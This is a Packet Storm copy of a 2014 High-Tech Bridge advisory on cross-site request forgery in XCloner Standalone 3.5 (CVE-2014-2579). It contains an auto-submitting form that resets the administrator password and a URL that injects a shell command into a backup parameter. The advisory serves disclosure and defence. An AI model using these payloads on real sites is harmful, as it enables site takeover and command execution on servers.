exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XCloner Standalone 3.5 Cross Site Request Forgery

XCloner Standalone 3.5 Cross Site Request Forgery
Posted Apr 9, 2014
Authored by High-Tech Bridge SA | Site htbridge.com

XCloner Standalone version 3.5 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2014-2579
SHA-256 | 7cff0b0c5062289d1c5503f87678d7e6b556fb49bac270e87ee36c051e96f8a0

XCloner Standalone 3.5 Cross Site Request Forgery

Change Mirror Download
Advisory ID: HTB23207
Product: XCloner Standalone
Vendor: XCloner
Vulnerable Version(s): 3.5 and probably prior
Tested Version: 3.5
Advisory Publication: March 14, 2014 [without technical details]
Vendor Notification: March 14, 2014
Public Disclosure: April 9, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2579
Risk Level: High
CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Standalone, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the website.


1. Сross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579

1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and change administrator’s password.

The exploitation example below changes password for user 'login' to 'immuniweb':


<form action="http://[host]/index2.php" method="post" name="main">
<input type="hidden" name="jcuser" value="login">
<input type="hidden" name="jcpass" value="password">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="config">
<input type="hidden" name="action" value="save">
<script>
document.main.submit();
</script>
</form>


1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and execute arbitrary system commands on vulnerable system with privileges of the webserver.

The exploitation example below uses the 'echo' system command to write 'immuniweb' string into file '/var/www/file.php':

http://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1&cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20||

Successful exploitation of this vulnerability requires that options 'enable_db_backup' and 'sql_mem' are enabled in application’s configuration file.

-----------------------------------------------------------------------------------------------

Solution:

Vendor ignored:
- 6 notifications by email
- 4 notifications via contact form
- 1 notification via twitter.

Currently we are not aware of any official solution for this vulnerability. As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via WAF of .htaccess.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23207 - https://www.htbridge.com/advisory/HTB23207 - Сross-Site Request Forgery (CSRF) in XCloner Standalone.
[2] XCloner Standalone - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close